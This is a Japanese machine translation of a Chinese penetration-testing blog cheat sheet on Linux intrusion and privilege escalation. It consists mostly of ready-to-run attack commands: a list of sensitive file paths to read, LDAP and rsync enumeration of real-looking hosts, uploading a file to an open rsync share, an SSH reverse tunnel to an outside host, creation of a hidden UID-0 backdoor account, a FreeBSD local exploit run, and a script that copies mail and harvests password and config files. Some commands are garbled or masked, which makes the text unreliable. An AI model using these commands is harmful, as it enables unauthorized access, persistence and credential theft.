Linux***と提権:テクニックまとめ編

16581 ワード

Linuxシステムの一般的なパス:

/etc/passwd    /etc/shadow    /etc/fstab    /etc/host.conf    /etc/motd    /etc/ld.so.conf    /var/www/htdocs/index.php    /var/www/conf/httpd.conf    /var/www/htdocs/index.html    /var/httpd/conf/php.ini    /var/httpd/htdocs/index.php    /var/httpd/conf/httpd.conf    /var/httpd/htdocs/index.html    /var/httpd/conf/php.ini    /var/www/index.html    /var/www/index.php    /opt/www/conf/httpd.conf    /opt/www/htdocs/index.php    /opt/www/htdocs/index.html    /usr/local/apache/htdocs/index.html    /usr/local/apache/htdocs/index.php    /usr/local/apache2/htdocs/index.html    /usr/local/apache2/htdocs/index.php    /usr/local/httpd2.2/htdocs/index.php    /usr/local/httpd2.2/htdocs/index.html    /tmp/apache/htdocs/index.html    /tmp/apache/htdocs/index.php    /etc/httpd/htdocs/index.php    /etc/httpd/conf/httpd.conf    /etc/httpd/htdocs/index.html    /www/php/php.ini    /www/php4/php.ini    /www/php5/php.ini    /www/conf/httpd.conf    /www/htdocs/index.php    /www/htdocs/index.html    /usr/local/httpd/conf/httpd.conf    /apache/apache/conf/httpd.conf    /apache/apache2/conf/httpd.conf    /etc/apache/apache.conf    /etc/apache2/apache.conf    /etc/apache/httpd.conf    /etc/apache2/httpd.conf    /etc/apache2/vhosts.d/00_default_vhost.conf    /etc/apache2/sites-available/default    /etc/phpmyadmin/config.inc.php    /etc/mysql/my.cnf    /etc/httpd/conf.d/php.conf    /etc/httpd/conf.d/httpd.conf    /etc/httpd/logs/error_log    /etc/httpd/logs/error.log    /etc/httpd/logs/access_log    /etc/httpd/logs/access.log    /home/apache/conf/httpd.conf    /home/apache2/conf/httpd.conf    /var/log/apache/error_log    /var/log/apache/error.log    /var/log/apache/access_log    /var/log/apache/access.log    /var/log/apache2/error_log    /var/log/apache2/error.log    /var/log/apache2/access_log    /var/log/apache2/access.log    /var/www/logs/error_log    /var/www/logs/error.log    /var/www/logs/access_log    /var/www/logs/access.log    /usr/local/apache/logs/error_log    /usr/local/apache/logs/error.log    /usr/local/apache/logs/access_log    /usr/local/apache/logs/access.log    /var/log/error_log    /var/log/error.log    /var/log/access_log    /var/log/access.log    /usr/local/apache/logs/access_logaccess_log.old    /usr/local/apache/logs/error_logerror_log.old    /etc/php.ini    /bin/php.ini    /etc/init.d/httpd    /etc/init.d/mysql    /etc/httpd/php.ini    /usr/lib/php.ini    /usr/lib/php/php.ini    /usr/local/etc/php.ini    /usr/local/lib/php.ini    /usr/local/php/lib/php.ini    /usr/local/php4/lib/php.ini    /usr/local/php4/php.ini    /usr/local/php4/lib/php.ini    /usr/local/php5/lib/php.ini    /usr/local/php5/etc/php.ini    /usr/local/php5/php5.ini    /usr/local/apache/conf/php.ini    /usr/local/apache/conf/httpd.conf    /usr/local/apache2/conf/httpd.conf    /usr/local/apache2/conf/php.ini    /etc/php4.4/fcgi/php.ini    /etc/php4/apache/php.ini    /etc/php4/apache2/php.ini    /etc/php5/apache/php.ini    /etc/php5/apache2/php.ini    /etc/php/php.ini    /etc/php/php4/php.ini    /etc/php/apache/php.ini    /etc/php/apache2/php.ini    /web/conf/php.ini    /usr/local/Zend/etc/php.ini    /opt/xampp/etc/php.ini    /var/local/www/conf/php.ini    /var/local/www/conf/httpd.conf    /etc/php/cgi/php.ini    /etc/php4/cgi/php.ini    /etc/php5/cgi/php.ini    /php5/php.ini    /php4/php.ini    /php/php.ini    /PHP/php.ini    /apache/php/php.ini    /xampp/apache/bin/php.ini    /xampp/apache/conf/httpd.conf    /NetServer/bin/stable/apache/php.ini    /home2/bin/stable/apache/php.ini    /home/bin/stable/apache/php.ini    /var/log/mysql/mysql-bin.log    /var/log/mysql.log    /var/log/mysqlderror.log    /var/log/mysql/mysql.log    /var/log/mysql/mysql-slow.log    /var/mysql.log    /var/lib/mysql/my.cnf    /usr/local/mysql/my.cnf    /usr/local/mysql/bin/mysql    /etc/mysql/my.cnf    /etc/my.cnf    /usr/local/cpanel/logs    /usr/local/cpanel/logs/stats_log    /usr/local/cpanel/logs/access_log    /usr/local/cpanel/logs/error_log    /usr/local/cpanel/logs/license_log    /usr/local/cpanel/logs/login_log    /usr/local/cpanel/logs/stats_log    /usr/local/share/examples/php4/php.ini    /usr/local/share/examples/php/php.ini    /usr/local/tomcat5527/bin/version.sh    /usr/share/tomcat6/bin/startup.sh    /usr/tomcat6/bin/startup.sh

Liunx関連提権***テクニックまとめ、一、ldap***テクニック:

1.cat /etc/nsswitch

パスワードログインポリシーを見るとfile ldapモードが使用されていることがわかります

2.less /etc/ldap.conf    base ou=People,dc=unix-center,dc=net

ou,dc,dc設定を見つけます
3.管理者情報の検索
匿名方式

ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

パスワード形式

ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

4.ユーザーレコードを10件検索

ldapsearch -h 192.168.2.2 -x -z 10 -p

実戦:

1.cat /etc/nsswitch

パスワードログインポリシーを見るとfile ldapモードが使用されていることがわかります

2.less /etc/ldap.conf    base ou=People,dc=unix-center,dc=net

ou,dc,dc設定を見つけます
3.管理者情報の検索
匿名方式

ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

パスワード形式

ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

4.ユーザーレコードを10件検索
ldap search-h 192.168.2.2-x-z 10-p指定ポート
***実戦:
1.すべての属性を返す

ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"    version: 1    dn: dc=ruc,dc=edu,dc=cn    dc: ruc    objectClass: domain    dn: uid=manager,dc=ruc,dc=edu,dc=cn    uid: manager    objectClass: inetOrgPerson    objectClass: organizationalPerson    objectClass: person    objectClass: top    sn: manager    cn: manager    dn: uid=superadmin,dc=ruc,dc=edu,dc=cn    uid: superadmin    objectClass: inetOrgPerson    objectClass: organizationalPerson    objectClass: person    objectClass: top    sn: superadmin    cn: superadmin    dn: uid=admin,dc=ruc,dc=edu,dc=cn    uid: admin    objectClass: inetOrgPerson    objectClass: organizationalPerson    objectClass: person    objectClass: top    sn: admin    cn: admin    dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn    uid: dcp_anonymous    objectClass: top    objectClass: person    objectClass: organizationalPerson    objectClass: inetOrgPerson    sn: dcp_anonymous    cn: dcp_anonymous

2.ベースクラスの表示

bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | more version: 1 dn: dc=ruc,dc=edu,dc=cn dc: ruc objectClass: domain

3.検索

bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"    version: 1    dn:    objectClass: top    namingContexts: dc=ruc,dc=edu,dc=cn    supportedExtension: 2.16.840.1.113730.3.5.7    supportedExtension: 2.16.840.1.113730.3.5.8    supportedExtension: 1.3.6.1.4.1.4203.1.11.1    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25    supportedExtension: 2.16.840.1.113730.3.5.3    supportedExtension: 2.16.840.1.113730.3.5.5    supportedExtension: 2.16.840.1.113730.3.5.6    supportedExtension: 2.16.840.1.113730.3.5.4    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22    supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24    supportedExtension: 1.3.6.1.4.1.1466.20037    supportedExtension: 1.3.6.1.4.1.4203.1.11.3    supportedControl: 2.16.840.1.113730.3.4.2    supportedControl: 2.16.840.1.113730.3.4.3    supportedControl: 2.16.840.1.113730.3.4.4    supportedControl: 2.16.840.1.113730.3.4.5    supportedControl: 1.2.840.113556.1.4.473    supportedControl: 2.16.840.1.113730.3.4.9    supportedControl: 2.16.840.1.113730.3.4.16    supportedControl: 2.16.840.1.113730.3.4.15    supportedControl: 2.16.840.1.113730.3.4.17    supportedControl: 2.16.840.1.113730.3.4.19    supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2    supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6    supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8    supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1    supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1    supportedControl: 2.16.840.1.113730.3.4.14    supportedControl: 1.3.6.1.4.1.1466.29539.12    supportedControl: 2.16.840.1.113730.3.4.12    supportedControl: 2.16.840.1.113730.3.4.18    supportedControl: 2.16.840.1.113730.3.4.13    supportedSASLMechanisms: EXTERNAL    supportedSASLMechanisms: DIGEST-MD5    supportedLDAPVersion: 2    supportedLDAPVersion: 3    vendorName: Sun Microsystems, Inc.    vendorVersion: Sun-Java(tm)-System-Directory/6.2    dataversion: 020090516011411    netscapemdsuffix: cn=ldap://dc=webA:389    supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA    supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA    supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA    supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA    supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA    supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA    supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA    supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA    supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA    supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA    supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA    supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA    supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA    supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA    supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA    supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA    supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA    supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA    supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5    supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA    supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA    supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA    supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA    supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA    supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA    supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA    supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA    supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA    supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA    supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA    supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA    supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA    supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA    supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA    supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA    supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5    supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5    supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA    supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA    supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA    supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA    supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA    supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5    supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5    supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5    supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5    supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5    supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5    supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5

Liunx関連提権***技巧総括、二、NFS***技巧:
IPを列挙:
showmount -e ip
Liunx関連提権***テクニックまとめ、三、rsync***テクニック:
1.rsyncサーバのリストを表示します.

rsync 210.51.X.X::    finance    img_finance    auto    img_auto    html_cms    img_cms    ent_cms    ent_img    ceshi    res_img    res_img_c2    chip    chip_c2    ent_icms    games    gamesimg    media    mediaimg    fashion    res-fashion    res-fo    taobao-home    res-taobao-home    house    res-house    res-home    res-edu    res-ent    res-labs    res-news    res-phtv    res-media    home    edu    news    res-book

該当する下位ディレクトリを見てください(ディレクトリの後ろに必ず追加してください/)

rsync 210.51.X.X::htdocs_app/    rsync 210.51.X.X::auto/    rsync 210.51.X.X::edu/

2.rsyncサーバ上のプロファイルのダウンロード

rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

3.rsyncファイルをアップデート(アップロードに成功し、上書きしません)

rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/   http://app.finance.xxx.com/warn/nothack.txt

Liunx関連提権***テクニック総括、四、squid***テクニック:

nc -vv  80    GET HTTP://www.sina.com / HTTP/1.0    GET HTTP://WWW.sina.com:22 / HTTP/1.0

Liunx関連提権***技術総括、五、SSHポート転送:

ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

Liunx関連提権***テクニックまとめ、六、joomla***テクニック:
バージョンの決定:

index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47

パスワードの再設定:

index.php?option=com_user&view=reset&layout=confirm

Liunx関連提権***テクニックまとめ、7、LinuxがUID 0を追加したrootユーザー:

useradd -o -u 0 nothack

Liunx関連提権***テクニックまとめ、八、freebsdローカル提権:

[argp@julius ~]$ uname -rsi    * freebsd 7.3-RELEASE GENERIC    * [argp@julius ~]$ sysctl vfs.usermount    * vfs.usermount: 1    * [argp@julius ~]$ id    * uid=1001(argp) gid=1001(argp) groups=1001(argp)    * [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex    * [argp@julius ~]$ ./nfs_mount_ex    *    calling nmount()

tarフォルダパッケージ:
1、tarパッケージ:

tar -cvf /home/public_html/*.tar /home/public_html/--exclude=    *.gif       /xx/xx/*    alzip  (  ) alzip -a D:/WEB d:/web*.rar

{
注意:
tarのパッケージ方式については、linuxは拡張子でファイルタイプを決定しません.
圧縮するとtar-ztf*.tar.gz圧縮パッケージの内容tar-zxf*.tar.gz解凍
では、これを使ったほうがいいです.

tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude=     *.gif        /xx/xx/*

}
システム情報収集:

for linux：    #!/bin/bash    echo #######geting sysinfo####    echo ######usage: ./getinfo.sh >/tmp/sysinfo.txt    echo #######basic infomation##    cat /proc/meminfo    echo    cat /proc/cpuinfo    echo    rpm -qa 2>/dev/null    ######stole the mail......######    cp -a /var/mail /tmp/getmail 2>/dev/null    echo 'u'r id is' `id`    echo ###atq&crontab#####    atq    crontab -l    echo #####about var#####    set    echo #####about network###    ####this is then point in pentest,but i am a new bird,so u need to add some in it    cat /etc/hosts    hostname    ipconfig -a    arp -v    echo ########user####    cat /etc/passwd|grep -i sh    echo ######service####    chkconfig --list    for i in {oracle,mysql,tomcat,samba,apache,ftp}    cat /etc/passwd|grep -i $i    done    locate passwd >/tmp/password 2>/dev/null    sleep 5    locate password >>/tmp/password 2>/dev/null    sleep 5    locate conf >/tmp/sysconfig 2>dev/null    sleep 5    locate config >>/tmp/sysconfig 2>/dev/null    sleep 5    ###maybe can use "tree /"###    echo ##packing up#########    tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig    rm -rf /tmp/getmail /tmp/password /tmp/sysconfig

転載先:https://blog.51cto.com/0daysec/1571871

MAC vimのインストールと構成

crontabインポートタスクリスト